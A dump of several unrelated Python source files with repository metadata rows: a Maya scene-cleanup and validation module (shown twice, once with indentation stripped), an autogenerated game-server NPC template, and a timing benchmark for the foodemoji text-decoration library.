        setList = list(set(setList) - set(excluded))
    for deleteSet in setList:
        # Best-effort delete: some sets may refuse deletion
        try:
            mc.delete(deleteSet)
        except:
            pass
    return setList
def deleteUnusedShadingNodes():
    '''
    Delete all unused shading nodes in the scene via Maya's builtin MEL command.
    '''
    mm.eval('MLdeleteUnused')
def deleteDisplayLayers():
    '''
    Delete all display layers except the default layer.
    '''
    # FIX: guard against None from mc.ls(), and against list.remove()
    # raising ValueError when 'defaultLayer' is not in the result.
    displayLayers = mc.ls(type='displayLayer') or []
    if 'defaultLayer' in displayLayers:
        displayLayers.remove('defaultLayer')
    if displayLayers:
        mc.delete(displayLayers)
    return displayLayers
def deleteRenderLayers():
    '''
    Delete all render layers except the default render layer.
    '''
    # FIX: guard against None from mc.ls(), and against list.remove()
    # raising ValueError when 'defaultRenderLayer' is not in the result.
    renderLayers = mc.ls(type='renderLayer') or []
    if 'defaultRenderLayer' in renderLayers:
        renderLayers.remove('defaultRenderLayer')
    if renderLayers:
        mc.delete(renderLayers)
    return renderLayers
def assignInitialShadingGroup(geoList=[]):
    '''
    Assign initialShadingGroup (lambert1) to specified geometry.
    @param geoList: List of geometry to apply default shader to. If empty, use all scene geometry.
    @type geoList: list
    '''
    if not geoList:
        geoList = mc.ls(geometry=True)
    if not geoList:
        return []
    # Force-add geometry to the default shading group
    mc.sets(geoList, fe='initialShadingGroup')
    return geoList
def zeroTransforms(objList=[]):
    '''
    Reset transform values to their rest pose (translate/rotate 0, scale 1).
    @param objList: List of transforms to zero out. If empty, process all scene transforms.
    @type objList: list
    '''
    if not objList:
        objList = mc.ls(transforms=True)
    if not objList:
        return []
    for obj in objList:
        # Translate and rotate rest at 0.0 (only if the attribute is settable)
        for attr in ('tx', 'ty', 'tz', 'rx', 'ry', 'rz'):
            if mc.getAttr(obj + '.' + attr, se=True):
                mc.setAttr(obj + '.' + attr, 0)
        # FIX: scale rest value is 1.0, not 0 — the original set scale to 0,
        # which collapses geometry. This also matches checkTransforms(),
        # which compares scale against 1.0.
        for attr in ('sx', 'sy', 'sz'):
            if mc.getAttr(obj + '.' + attr, se=True):
                mc.setAttr(obj + '.' + attr, 1)
    return objList
def copyInputShapeAttrs(geoList=[]):
    '''
    Copy user defined attributes from an input shape to the output deforming shape.
    @param geoList: List of geometry to copy attributes for. If empty, process all scene geometry.
    @type geoList: list
    '''
    if not geoList:
        geoList = mc.listRelatives(mc.ls(geometry=True) or [], p=True, pa=True) or []
    if not geoList:
        return []
    for geo in geoList:
        # Output (non-intermediate) shape
        outShapes = mc.listRelatives(geo, s=True, ni=True) or []
        if not outShapes:
            print('No shape found for geometry transform "'+geo+'"!')
            continue
        outShape = outShapes[0]
        # Locate the input (pre-deformation) shape; fall back to the output shape
        inShape = outShape
        try:
            inShape = glTools.utils.shape.findInputShape(outShape)
        except:
            pass
        # Copy user attributes only when a distinct input shape exists
        if inShape != outShape:
            for attr in (mc.listAttr(inShape, ud=True, s=True) or []):
                glTools.utils.attribute.copyAttr(inShape, outShape, attr)
# ========
# - MISC -
# ========
def removeTurtle():
    '''
    Delete nodes and unload the plugin related to the Turtle renderer.
    '''
    # Remove the Turtle bake layer node if present (it is created locked)
    turtleNode = 'TurtleDefaultBakeLayer'
    if mc.objExists(turtleNode):
        print('Removing Turtle nodes...')
        mc.lockNode(turtleNode, l=False)
        mc.delete(turtleNode)
    # Unload the plugin if it is currently loaded
    if mc.pluginInfo('Turtle', q=True, loaded=True):
        print('Unloading Turtle plugin...')
        try:
            mc.unloadPlugin('Turtle', f=True)
        except:
            print('Error unloading Turtle plugin!')
| 25.851967
| 174
| 0.699916
|
import maya.mel as mm
import maya.cmds as mc
import glTools.utils.attribute
import glTools.utils.base
import glTools.utils.layer
import glTools.utils.reference
import glTools.utils.shader
import glTools.utils.shape
import glTools.utils.transform
import re
def toggleCons(state):
conList = mc.ls('*Con*_jnt',type='joint')
for conJnt in conList:
if state:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(conJnt+'.drawStyle',0)
else:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(conJnt+'.drawStyle',2)
if mc.getAttr(conJnt+'.radius',se=True):
mc.setAttr(conJnt+'.radius',0.0)
mc.setAttr(conJnt+'.radius',cb=False)
if mc.getAttr(conJnt+'.ro',se=True):
mc.setAttr(conJnt+'.ro',cb=False)
return conList
def toggleEnds(state):
endList = mc.ls('*End_jnt',type='joint')
for endJnt in endList:
if state:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(endJnt+'.drawStyle',0)
else:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(endJnt+'.drawStyle',2)
if mc.getAttr(endJnt+'.radius',se=True):
mc.setAttr(endJnt+'.radius',0.0)
mc.setAttr(endJnt+'.radius',cb=False)
if mc.getAttr(endJnt+'.ro',se=True):
mc.setAttr(endJnt+'.ro',cb=False)
return endList
def disableDrawingOverrides(grp):
if not mc.objExists(grp):
raise Exception('Transform "'+grp+'" does not exists!')
if not glTools.utils.transform.isTransform(grp):
raise Exception('Object "'+grp+'" is not a valid transform!')
nodeList = mc.ls(mc.listRelatives(grp,ad=True, pa=True) or [],dag=True) or []
if not nodeList: return []
overrideName = 'overrideEnabled'
for node in nodeList:
overrideAttr = node+'.'+overrideName
if not mc.attributeQuery(overrideName,n=node,ex=True):
print('Override attribute "'+overrideAttr+'" does not exist! Skipping...')
continue
overrideConn = mc.listConnections(overrideAttr,s=True,d=False) or []
if overrideConn:
print('Found incoming connection for override attribute "'+overrideAttr+'"! ('+overrideConn[0]+')')
print('Disconnecting attribute and disabling drawing overrides...')
mc.disconnectAttr(overrideConn[0],overrideAttr)
try: mc.setAttr(overrideAttr,0)
except: pass
return nodeList
def uniqueNameCheck(objList=[],transformsOnly=False):
if not objList:
objList = mc.ls()
if transformsOnly:
nodeList = mc.ls(objList,transforms=True)
else:
nodeList = mc.ls(objList,dag=True)
nonUniqueList = [i for i in nodeList if i.count('|')]
return nonUniqueList
def validNameCheck(objList=[]):
if not objList: objList = mc.ls()
if not objList: return []
defNodes = ['dof1','time1','lambert1','postProcessList1','sequenceManager1','lightLinker1','renderGlobalsList1','dynController1','lightList1','particleCloud1','shaderGlow1']
objList = [obj for obj in objList if not defNodes.count(obj)]
objList = [obj for obj in objList if not obj.startswith('default')]
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectTypeFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectNameFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectScriptFilter']
result = []
for obj in objList:
if obj.count('pasted'): result.append(obj)
if obj.count('poly'): result.append(obj)
if obj.count('__'): result.append(obj)
digitSearch = re.search('(\d+)$', obj)
if digitSearch and glTools.utils.transform.isTransform(obj):
if digitSearch.group(0):
result.append(obj)
result = list(set(result))
return result
def shapeNameCheck( objList = [],
typeList = ['mesh','nurbsCurve','nurbsSurface'],
skipIntermediates = True,
skipMultipleShapes = False,
strict = True ):
if not objList: objList = mc.ls(type=typeList)
shapeList = []
for obj in objList:
if glTools.utils.transform.isTransform(obj):
objShapes = mc.listRelatives(obj,s=True,pa=True)
if not objShapes: continue
if (len(objShapes) > 1) and skipMultipleShapes: continue
tShapeList = mc.listRelatives(obj,s=True,ni=skipIntermediates,pa=True)
for shape in tShapeList:
shapeList.append(obj)
elif glTools.utils.shape.isShape(obj):
shapeList.append(obj)
else:
print('Unable to determine shape from object "'+obj+'"! Skipping...')
invalidShapeNameList = []
for shape in shapeList:
if not typeList.count(mc.objectType(shape)): continue
if skipIntermediates and mc.getAttr(shape+'.intermediateObject'): continue
parent = mc.listRelatives(shape,p=True,pa=True)[0]
shapeSN = mc.ls(shape,sn=True)[0]
parentSN = mc.ls(parent,sn=True)[0]
if strict and (shape != parent+'Shape'):
invalidShapeNameList.append(shape)
if not shapeSN.startswith(parentSN):
invalidShapeNameList.append(shape)
elif not shapeSN.count('Shape'):
invalidShapeNameList.append(shape)
return invalidShapeNameList
def intermediateShapesCheck(objList=[]):
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,transforms=True)
result = []
for obj in objList:
shapes = mc.listRelatives(obj,s=True,pa=True)
if not shapes: shapes = []
for shape in shapes:
if mc.objExists(shape+'.intermediateObject'):
if mc.getAttr(shape+'.intermediateObject'):
result.append(shape)
return result
def multipleShapeCheck(objList=[]):
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,dag=True)
result = []
for transform in objList:
if not glTools.utils.transform.isTransform(transform):
transform = mc.listRelatives(transform,p=True)[0]
shapeList = mc.listRelatives(transform,s=True)
if not shapeList: continue
shapeList = mc.ls(shapeList,type=['mesh','nurbsSurface','nurbsCurve'])
if len(shapeList) > 1: result.append(transform)
return result
def constructionHistoryCheck(geoList=[]):
if not geoList:
geoList = mc.ls(geometry=True)
else:
geoList = mc.listRelatives(geoList,s=True,pa=True)
result = []
for geo in geoList:
hist = mc.listHistory(geo)
if hist.count(geo): hist.remove(geo)
ignore = mc.ls(hist,type=['groupId','shadingEngine','transform'])
hist = list(set(hist)-set(ignore))
if hist:
obj = mc.listRelatives(geo,p=True,pa=True)
result.extend(obj)
if result: result = list(set(result))
return result
def userAttrCheck(objList=[],includeShapes=False):
result = []
if not objList: objList = mc.ls()
for obj in objList:
userAttrs = mc.listAttr(obj,ud=True)
if not userAttrs: userAttrs = []
for attr in userAttrs:
result.append(obj+'.'+attr)
if includeShapes:
shapes = mc.listRelatives(obj,s=True)
if not shapes: shapes = []
for shape in shapes:
userAttrs = mc.listAttr(shape,ud=True)
if not userAttrs: userAttrs = []
for attr in userAttrs:
result.append(shape+'.'+attr)
return result
def emptyGroupCheck(objList=[]):
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,transforms=True)
result = []
for grp in objList:
if not mc.listRelatives(grp,ad=True):
result.append(grp)
return result
def emptySetCheck(setList=[]):
if not setList: setList = mc.ls(sets=True)
result = []
for setName in setList:
if not mc.ls(setName,sets=True): continue
if setName.startswith('default'): continue
if setName.startswith('initial'): continue
if not mc.sets(setName,q=True):
result.append(setName)
return result
def emptyLayerCheck(layerList=[]):
if not layerList: layerList = mc.ls(type=['displayLayer','renderLayer','animLayer'])
else: layerList = mc.ls(layerList,type=['displayLayer','renderLayer','animLayer'])
result = []
for layer in layerList:
if not mc.ls(layer,type=['displayLayer','renderLayer','animLayer']): continue
if layer.startswith('default'): continue
if not glTools.utils.layer.memberList(layer):
result.append(layer)
return result
def animCurveCheck(curveTypeList=['animCurveTL','animCurveTA','animCurveTT','animCurveTU','animCurveUL','animCurveUA','animCurveUT','animCurveUU']):
animCurves = []
for curveType in curveTypeList:
curveList = mc.ls(type=curveType)
if curveList:
animCurves.extend(curveList)
return animCurves
def unusedShadingNodeCheck():
return glTools.utils.shader.listUnusedShadingNodes()
def noGeometryShaderCheck(geoList=[]):
if not geoList:
geoList = mc.ls(type=['mesh','nurbsSurface'],ni=True)
else:
geoList += mc.ls(mc.listRelatives(geoList,ad=True,pa=True) or [],type=['mesh','nurbsSurface'],ni=True) or []
geoList = mc.ls(geoList,type=['mesh','nurbsSurface'],ni=True)
noShaderList = []
for geo in geoList:
SG = glTools.utils.shader.getSG(geo)
if not SG: noShaderList.append(geo)
return noShaderList
def unusedReferenceCheck():
result = []
refList = glTools.utils.reference.listReferences()
for ref in refList:
try: refFile = glTools.utils.reference.getReferenceFile(ref)
except: result.append(ref)
return result
def unknownNodeCheck():
result = mc.ls(type='unknown')
if not result: result = []
return result
def checkTransforms(objList=[],tol=0.0000000001):
if not objList: objList = mc.ls(transforms=True)
if not objList: return []
transformList = []
for obj in objList:
if obj == 'persp': continue
if obj == 'front': continue
if obj == 'side': continue
if obj == 'top': continue
if abs(mc.getAttr(obj+'.tx')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.ty')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.tz')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.rx')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.ry')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.rz')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sx') - 1.0) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sy') - 1.0) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sz') - 1.0) > tol:
transformList.append(obj)
continue
return transformList
def displayOverridesCheck(objList=[]):
if not objList: objList = mc.ls(dag=True)
else: objList = mc.ls(objList,dag=True)
displayOverrideList = []
for obj in objList:
if mc.getAttr(obj+'.overrideEnabled'):
displayOverrideList.append(obj)
return displayOverrideList
def shapeNameFix(shape):
parent = mc.listRelatives(shape,p=True)[0]
shapeName = parent+'Shape'
if mc.objExists(shapeName):
raise Exception('Shape "'+shapeName+'" already exists! Unable to rename shape "'+shape+'"!')
newShape = mc.rename(shape,shapeName)
return newShape
def deleteIntermediateShapes(objList=[]):
intermediateShapeList = intermediateShapesCheck(objList)
if intermediateShapeList: mc.delete(intermediateShapeList)
return intermediateShapeList
def deleteConstructionHistory(geoList=[]):
if not geoList: geoList = mc.ls(geometry=True)
for geo in geoList: mc.delete(geo,ch=True)
return geoList
def deleteUserAttrs(nodeList=[],includeShapes=False):
if not nodeList: nodeList = mc.ls()
for node in nodeList:
glTools.utils.attribute.deleteUserAttrs(node)
if includeShapes:
shapes = mc.listRelatives(node,s=True)
for shape in shapes:
glTools.utils.attribute.deleteUserAttrs(shape)
def deleteEmptyGroups(objList=[]):
emptyGrpList = emptyGroupCheck(objList=objList)
if emptyGrpList: mc.delete(emptyGrpList)
return emptyGrpList
def deleteEmptySets(setList=[]):
emptySetList = emptySetCheck(setList=setList)
if emptySetList: mc.delete(emptySetList)
return emptySetList
def deleteEmptyLayers(layerList=[]):
emptyLayerList = emptyLayerCheck(layerList=layerList)
if emptyLayerList: mc.delete(emptyLayerList)
return emptyLayerList
def deleteUnknownNodes():
unknownNodes = unknownNodeCheck() or []
for node in unknownNodes:
try:
mc.lockNode(node,l=False)
mc.delete(node)
except:
print('Problem deleting unknown node "'+node+'"!')
return unknownNodes
def deleteNodesByType(nodeTypeList=[]):
if not nodeTypeList: return []
nodeList = mc.ls(type=nodeTypeList)
if nodeList: mc.delete(nodeList)
else: nodeList = []
return nodeList
def deleteUnusedReferenceNodes():
mm.eval('RNdeleteUnused')
def deleteEmptySets(setList=[]):
if not setList: setList = mc.ls(sets=True)
emptySetList = []
for set in setList:
if not mc.sets(set,q=True):
emptySetList.append(set)
for emptySet in emptySetList:
try: mc.delete(emptySet)
except: pass
return emptySetList
def deleteAllSets(excludeList=[]):
setList = mc.ls(sets=True)
if excludeList:
excludeSetList = mc.ls(excludeList,sets=True)
setList = list(set(setList)-set(excludeSetList))
for deleteSet in setList:
try: mc.delete(deleteSet)
except: pass
return setList
def deleteUnusedShadingNodes():
mm.eval('MLdeleteUnused')
def deleteDisplayLayers():
displayLayers = mc.ls(type='displayLayer')
displayLayers.remove('defaultLayer')
if displayLayers: mc.delete(displayLayers)
return displayLayers
def deleteRenderLayers():
renderLayers = mc.ls(type='renderLayer')
renderLayers.remove('defaultRenderLayer')
if renderLayers: mc.delete(renderLayers)
return renderLayers
def assignInitialShadingGroup(geoList=[]):
if not geoList: geoList = mc.ls(geometry=True)
if not geoList: return []
mc.sets(geoList,fe='initialShadingGroup')
return geoList
def zeroTransforms(objList=[]):
    '''
    Reset transform values to their rest pose (translate/rotate 0, scale 1).
    @param objList: List of transforms to zero out. If empty, process all scene transforms.
    @type objList: list
    '''
    if not objList:
        objList = mc.ls(transforms=True)
    if not objList:
        return []
    for obj in objList:
        # Translate and rotate rest at 0.0 (only if the attribute is settable)
        for attr in ('tx', 'ty', 'tz', 'rx', 'ry', 'rz'):
            if mc.getAttr(obj + '.' + attr, se=True):
                mc.setAttr(obj + '.' + attr, 0)
        # FIX: scale rest value is 1.0, not 0 — the original set scale to 0,
        # which collapses geometry.
        for attr in ('sx', 'sy', 'sz'):
            if mc.getAttr(obj + '.' + attr, se=True):
                mc.setAttr(obj + '.' + attr, 1)
    return objList
def copyInputShapeAttrs(geoList=[]):
if not geoList: geoList = mc.listRelatives(mc.ls(geometry=True) or [],p=True,pa=True) or []
if not geoList: return []
for geo in geoList:
geoShape = mc.listRelatives(geo,s=True,ni=True) or []
if not geoShape:
print('No shape found for geometry transform "'+geo+'"!')
continue
geoInputShape = geoShape[0]
try: geoInputShape = glTools.utils.shape.findInputShape(geoShape[0])
except: pass
if geoInputShape != geoShape[0]:
userAttr = mc.listAttr(geoInputShape,ud=True,s=True) or []
for at in userAttr: glTools.utils.attribute.copyAttr(geoInputShape,geoShape[0],at)
def removeTurtle():
turtleNode = 'TurtleDefaultBakeLayer'
if mc.objExists(turtleNode):
print('Removing Turtle nodes...')
mc.lockNode(turtleNode,l=False)
mc.delete(turtleNode)
if mc.pluginInfo('Turtle',q=True,loaded=True):
print('Unloading Turtle plugin...')
try: mc.unloadPlugin('Turtle',f=True)
except: print('Error unloading Turtle plugin!')
| true
| true
|
790c8a5ad4870b39b761cf8182a056f45a6f79f3
| 446
|
py
|
Python
|
data/scripts/templates/object/mobile/shared_warren_bors_teraud.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/mobile/shared_warren_bors_teraud.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/mobile/shared_warren_bors_teraud.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_warren_bors_teraud.iff"
result.attribute_template_id = 9
result.stfName("npc_name","warren_bors_teraud")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 26.235294
| 64
| 0.730942
| true
| true
|
|
790c8b129da1130af784e30e95e0fd923fc98ff0
| 5,432
|
py
|
Python
|
tests/speed.py
|
cvzi/foodemoji
|
b43d80f5a6abada96d8383a5fb442e4bf4083631
|
[
"MIT"
] | 1
|
2021-07-28T18:31:59.000Z
|
2021-07-28T18:31:59.000Z
|
tests/speed.py
|
cvzi/foodemoji
|
b43d80f5a6abada96d8383a5fb442e4bf4083631
|
[
"MIT"
] | null | null | null |
tests/speed.py
|
cvzi/foodemoji
|
b43d80f5a6abada96d8383a5fb442e4bf4083631
|
[
"MIT"
] | 1
|
2018-10-23T09:20:52.000Z
|
2018-10-23T09:20:52.000Z
|
# -*- coding: utf-8 -*-
# https://github.com/cvzi/foodemoji
import sys
import os
import timeit
try:
import foodemoji
except ImportError:
include = os.path.relpath(os.path.join(os.path.dirname(__file__), ".."))
sys.path.insert(0, include)
import foodemoji
print("Imported foodemoji from %s" % os.path.abspath(os.path.join(include, "foodemoji")))
PY2 = sys.version_info.major == 2
text = """Erbsencremesuppe
Mousse Tiramisu, Wackelpudding Kirsch (vegan)
Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten
Tagessuppe,
Fish + Chips,
Remouladensauce,
Salat der Saison
Tagessuppe,
2 Polentaschnitten mit Spinatfüllung,
Tomatensauce,
Reis,
Salat der Saison
Karotten-Ingwersuppe
Rote Grütze (vegan), Zweierlei Mousse au Chocolat
Milch
Tagessuppe,
Schweinegulasch,
Champignonsauce,
Salzkartoffeln,
Salat der Saison
Tagessuppe,
5 Cannelloni mit Ricotta-Spinat-Füllung,
Tomatensauce,
Reibekäse,
Salat der Saison
Tomatencremesuppe
Milchreis mit Kirschen, Rote Grütze (vegan)
Tagessuppe,
Feuerwurst,
Portion Senf,
Pommes frites,
Salat der Saison
Tagessuppe,
2 Kartoffelknödel,
Rahmgemüse,
Salat der Saison
Kohlrabicremesuppe Creme Brulee, Kokosmilch mit Ananas (vegan) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten Erbseneintopf, Bockwurst, Kartoffeln, Brötchen, Salat der Saison, Schokopudding Tagessuppe, Asiatische Gemüseknusperschnitte, Wasabi Currysauce, Reis, Salat der Saison, Gebrannte Grießsuppe Kokosmilch mit Ananas (vegan), Mousse au Chocolat Milch (ML) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten D: Tagessuppe, Schweinegeschnetzeltes, Pilzrahmsauce, Reis, Salat der Saison Tagessuppe, Knöpflepfanne "Allgäu", Käsesauce, Salat der Saison.
Brokkolicremesuppe
Sojajoghurt mit Früchten (vegan), Tiramisu
Milch (ML)
Tagessuppe,
paniertes Alaska-Seelachsfilet,
Dillmayonnaise,
Petersilienkartoffeln,
Salat der Saison
Tagessuppe,
veganes Geschnetzeltes „Züricher Art",
Reis,
Salat der Saison
"""
text_short = """Erbsencremesuppe
Mousse Tiramisu, Wackelpudding Kirsch (vegan)
Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten
Kohlrabicremesuppe Creme Brulee, Kokosmilch mit Ananas (vegan) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten Erbseneintopf, Bockwurst, Kartoffeln, Brötchen, Salat der Saison, Schokopudding Tagessuppe, Asiatische Gemüseknusperschnitte, Wasabi Currysauce, Reis, Salat der Saison, Gebrannte Grießsuppe Kokosmilch mit Ananas (vegan), Mousse au Chocolat Milch (ML) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten D: Tagessuppe, Schweinegeschnetzeltes, Pilzrahmsauce, Reis, Salat der Saison Tagessuppe, Knöpflepfanne "Allgäu", Käsesauce, Salat der Saison.
Salat der Saison
"""
text_one_line = "Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten"
book = ""
def _setup():
global book
filename = 'italienische-reise.txt'
url = 'https://github.com/GITenberg/Italienische-Reise-Band-1_2404/raw/master/2404-8.txt'
if not os.path.isfile(filename):
if PY2:
import urllib2
furl = urllib2.urlopen(url)
book = furl.read().decode('cp1252' ,errors='ignore')
furl.close()
else:
import urllib.request
with urllib.request.urlopen(url) as furl:
book = furl.read().decode('utf-8' ,errors='ignore')
with open(filename, 'wb') as fout:
fout.write(book.encode('utf-8'))
else:
with open(filename, 'rb') as fin:
book = fin.read().decode('utf-8')
def test_long_text_100():
x = foodemoji.decorate(text)
return x[0] == text[0]
def test_long_text_linebyline_100():
x = foodemoji.decorate(text, line_by_line=True)
return x[0] == text[0]
def test_short_text_300():
x = foodemoji.decorate(text_short)
return x[0] == text_short[0]
def test_short_text_linebyline_300():
x = foodemoji.decorate(text_short, line_by_line=True)
return x[0] == text_short[0]
def test_one_line_1000():
x = foodemoji.decorate(text_one_line)
return x[0] == text_one_line[0]
def test_one_line_linebyline_1000():
x = foodemoji.decorate(text_one_line, line_by_line=True)
return x[0] == text_one_line[0]
def test_book_2():
x = foodemoji.decorate(book)
return x[0] == book[0]
def test_book_linebyline_2():
x = foodemoji.decorate(book, line_by_line=True)
return x[0] == book[0]
_setup()
if __name__ == '__main__':
for fname in sorted(list(globals().keys())):
if fname.startswith('test_'):
if fname.split('_')[-1].isdigit():
N = int(fname.split('_')[-1])
else:
N = 100
print("% 6dx\t\t%s():" % (N, fname))
t = timeit.timeit('speed.%s()' % fname, setup='import speed', number=N)
print("{:25.20f}".format(t))
| 36.952381
| 780
| 0.726804
|
import sys
import os
import timeit
try:
import foodemoji
except ImportError:
include = os.path.relpath(os.path.join(os.path.dirname(__file__), ".."))
sys.path.insert(0, include)
import foodemoji
print("Imported foodemoji from %s" % os.path.abspath(os.path.join(include, "foodemoji")))
PY2 = sys.version_info.major == 2
text = """Erbsencremesuppe
Mousse Tiramisu, Wackelpudding Kirsch (vegan)
Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten
Tagessuppe,
Fish + Chips,
Remouladensauce,
Salat der Saison
Tagessuppe,
2 Polentaschnitten mit Spinatfüllung,
Tomatensauce,
Reis,
Salat der Saison
Karotten-Ingwersuppe
Rote Grütze (vegan), Zweierlei Mousse au Chocolat
Milch
Tagessuppe,
Schweinegulasch,
Champignonsauce,
Salzkartoffeln,
Salat der Saison
Tagessuppe,
5 Cannelloni mit Ricotta-Spinat-Füllung,
Tomatensauce,
Reibekäse,
Salat der Saison
Tomatencremesuppe
Milchreis mit Kirschen, Rote Grütze (vegan)
Tagessuppe,
Feuerwurst,
Portion Senf,
Pommes frites,
Salat der Saison
Tagessuppe,
2 Kartoffelknödel,
Rahmgemüse,
Salat der Saison
Kohlrabicremesuppe Creme Brulee, Kokosmilch mit Ananas (vegan) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten Erbseneintopf, Bockwurst, Kartoffeln, Brötchen, Salat der Saison, Schokopudding Tagessuppe, Asiatische Gemüseknusperschnitte, Wasabi Currysauce, Reis, Salat der Saison, Gebrannte Grießsuppe Kokosmilch mit Ananas (vegan), Mousse au Chocolat Milch (ML) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten D: Tagessuppe, Schweinegeschnetzeltes, Pilzrahmsauce, Reis, Salat der Saison Tagessuppe, Knöpflepfanne "Allgäu", Käsesauce, Salat der Saison.
Brokkolicremesuppe
Sojajoghurt mit Früchten (vegan), Tiramisu
Milch (ML)
Tagessuppe,
paniertes Alaska-Seelachsfilet,
Dillmayonnaise,
Petersilienkartoffeln,
Salat der Saison
Tagessuppe,
veganes Geschnetzeltes „Züricher Art",
Reis,
Salat der Saison
"""
text_short = """Erbsencremesuppe
Mousse Tiramisu, Wackelpudding Kirsch (vegan)
Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten
Kohlrabicremesuppe Creme Brulee, Kokosmilch mit Ananas (vegan) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten Erbseneintopf, Bockwurst, Kartoffeln, Brötchen, Salat der Saison, Schokopudding Tagessuppe, Asiatische Gemüseknusperschnitte, Wasabi Currysauce, Reis, Salat der Saison, Gebrannte Grießsuppe Kokosmilch mit Ananas (vegan), Mousse au Chocolat Milch (ML) Schlemmerbuffet je 100g Reichhaltige Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten D: Tagessuppe, Schweinegeschnetzeltes, Pilzrahmsauce, Reis, Salat der Saison Tagessuppe, Knöpflepfanne "Allgäu", Käsesauce, Salat der Saison.
Salat der Saison
"""
text_one_line = "Milch Auswahl an frischen Salaten, Gemüse-, Fisch-, Geflügel-, Schweine- und Rindfleisch- und vegetarischen und veganen Gerichten"
book = ""
def _setup():
global book
filename = 'italienische-reise.txt'
url = 'https://github.com/GITenberg/Italienische-Reise-Band-1_2404/raw/master/2404-8.txt'
if not os.path.isfile(filename):
if PY2:
import urllib2
furl = urllib2.urlopen(url)
book = furl.read().decode('cp1252' ,errors='ignore')
furl.close()
else:
import urllib.request
with urllib.request.urlopen(url) as furl:
book = furl.read().decode('utf-8' ,errors='ignore')
with open(filename, 'wb') as fout:
fout.write(book.encode('utf-8'))
else:
with open(filename, 'rb') as fin:
book = fin.read().decode('utf-8')
def test_long_text_100():
x = foodemoji.decorate(text)
return x[0] == text[0]
def test_long_text_linebyline_100():
x = foodemoji.decorate(text, line_by_line=True)
return x[0] == text[0]
def test_short_text_300():
x = foodemoji.decorate(text_short)
return x[0] == text_short[0]
def test_short_text_linebyline_300():
x = foodemoji.decorate(text_short, line_by_line=True)
return x[0] == text_short[0]
def test_one_line_1000():
x = foodemoji.decorate(text_one_line)
return x[0] == text_one_line[0]
def test_one_line_linebyline_1000():
x = foodemoji.decorate(text_one_line, line_by_line=True)
return x[0] == text_one_line[0]
def test_book_2():
x = foodemoji.decorate(book)
return x[0] == book[0]
def test_book_linebyline_2():
x = foodemoji.decorate(book, line_by_line=True)
return x[0] == book[0]
_setup()
if __name__ == '__main__':
for fname in sorted(list(globals().keys())):
if fname.startswith('test_'):
if fname.split('_')[-1].isdigit():
N = int(fname.split('_')[-1])
else:
N = 100
print("% 6dx\t\t%s():" % (N, fname))
t = timeit.timeit('speed.%s()' % fname, setup='import speed', number=N)
print("{:25.20f}".format(t))
| true
| true
|
790c8bd261da619e5576efa5d9c7891f5c5b2620
| 3,856
